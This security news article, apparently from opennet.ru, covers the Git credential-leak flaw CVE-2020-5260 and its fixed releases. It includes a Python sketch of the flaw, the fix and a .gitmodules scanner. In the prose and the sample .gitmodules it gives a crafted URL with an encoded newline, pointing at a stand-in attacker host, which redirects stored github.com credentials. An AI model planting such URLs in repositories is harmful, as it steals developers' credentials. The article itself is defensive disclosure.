Git credential leakage vulnerability

Corrective releases of the distributed version control system Git have been published: 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4. They fix a vulnerability (CVE-2020-5260) in the "credential.helper" handler that causes credentials to be sent to the wrong host when a git client accesses a repository through a specially formatted URL containing a newline character. The vulnerability can be used to arrange for credentials belonging to another host to be sent to a server controlled by the attacker.

Given a URL such as "https://evil.com?%0ahost=github.com/", the credential handler, while connecting to the host evil.com, will pass along the authentication parameters stored for github.com. The problem appears during operations such as "git clone", including the processing of URLs for submodules (for example, "git submodule update" automatically processes the URLs listed in the repository's .gitmodules file). The vulnerability is most dangerous where the developer clones a repository without seeing the URL, for example when working with submodules, or in systems that act automatically, for example in package build scripts.

To block the vulnerability, the new versions forbid passing a newline character in any value transmitted through the credential exchange protocol. For distributions, the release of package updates can be tracked on the pages for Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.
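The mechanism and the fix described above, as an added example (not Git's own code): a simplified model of how the URL becomes key=value lines for a credential helper, plus a check for .gitmodules URLs that decode to a newline. The function names, the "last value wins" helper parsing and the sample .gitmodules content are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample .gitmodules content; the second URL is the one quoted above.
SAMPLE_GITMODULES = """\
[submodule "lib"]
    path = lib
    url = https://example.org/lib.git
[submodule "vendor"]
    path = vendor
    url = https://evil.com?%0ahost=github.com/
"""

def credential_message(url, reject_newlines=True):
    """Simplified model (assumption) of the key=value message sent to a helper."""
    scheme, rest = url.split("://", 1)
    # Host is taken up to the first "/", then percent-decoded: %0a becomes a newline.
    host = unquote(rest.split("/", 1)[0])
    fields = [("protocol", scheme), ("host", host)]
    if reject_newlines:  # behaviour of the fixed releases, as described above
        for key, value in fields:
            if "\n" in value:
                raise ValueError(f"newline in credential field {key!r}")
    return "".join(f"{key}={value}\n" for key, value in fields)

def helper_view(message):
    """Read the message line by line; a repeated key overrides the earlier one."""
    seen = {}
    for line in message.split("\n"):
        if "=" in line:
            key, value = line.split("=", 1)
            seen[key] = value
    return seen

def suspicious_submodule_urls(gitmodules_text):
    """Return submodule URLs whose percent-decoded form contains a newline."""
    pattern = r"^[ \t]*url[ \t]*=[ \t]*(\S+)[ \t]*$"
    urls = re.findall(pattern, gitmodules_text, re.MULTILINE)
    return [u for u in urls if "\n" in unquote(u)]

if __name__ == "__main__":
    url = "https://evil.com?%0ahost=github.com/"
    print(helper_view(credential_message(url, reject_newlines=False)))
    print(suspicious_submodule_urls(SAMPLE_GITMODULES))
```

With the check disabled, the helper's view of the message names github.com as the host even though the connection goes to evil.com; with it enabled, the URL is rejected before any helper is consulted.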

As a workaround to block the problem, it is recommended not to use credential.helper when accessing public repositories and not to use "git clone" in "--recurse-submodules" mode with unchecked repositories. To completely disable the credential.helper handler, which saves passwords to and retrieves them from a cache, protected storage or a password file, you can use the commands:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: opennet.ru
